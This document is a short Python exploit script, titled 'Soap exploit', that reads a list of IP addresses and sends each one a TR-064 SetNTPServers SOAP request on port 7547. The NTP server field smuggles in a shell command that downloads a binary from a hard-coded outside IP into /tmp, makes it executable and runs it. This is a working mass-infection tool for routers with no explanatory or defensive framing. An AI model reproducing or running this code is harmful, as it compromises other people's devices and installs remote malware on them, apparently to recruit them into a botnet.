[ PYTHON ] Soap exploit

1. import requests
2. import sys
3.  
4. if (len(sys.argv) < 2):
5.     print("usage: python {0} list.txt. list.txt should 1 ip per line.".format(sys.argv[0]))
6.     sys.exit(1)
7.  
8. memes = open(sys.argv[1])
9. lines = memes.readlines()
10. cgi = "/UD/act?1"
11.  
12. request = """<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
13. <SOAP-ENV:Body>
14.     <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
15.     <NewNTPServer1>
16.         `cd /tmp;wget http://185.165.31.3/1;chmod 777 1; ./1`
17.     </NewNTPServer1>
18.     <NewNTPServer2></NewNTPServer2>
19.     <NewNTPServer3></NewNTPServer3>
20.     <NewNTPServer4></NewNTPServer4>
21.     <NewNTPServer5></NewNTPServer5>
22. </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>"""
23.  
24. headers = {"Host": "http://127.0.0.1:7547",
25.             "Content-Type":"text/xml",
26.             "Content-Length":str(len(request)),
27.             "SOAPAction":"urn:dslforum-org:service:Time:1#SetNTPServers"}
28.  
29. for line in lines:
30.     try:
31.         line = "http://"+line+cgi
32.         line = line.rstrip("\n")
33.         response = requests.post(url=line, headers=headers, data=request, allow_redirects=False)
34.         print("Success")
35.     except Exception as e:
36.         pass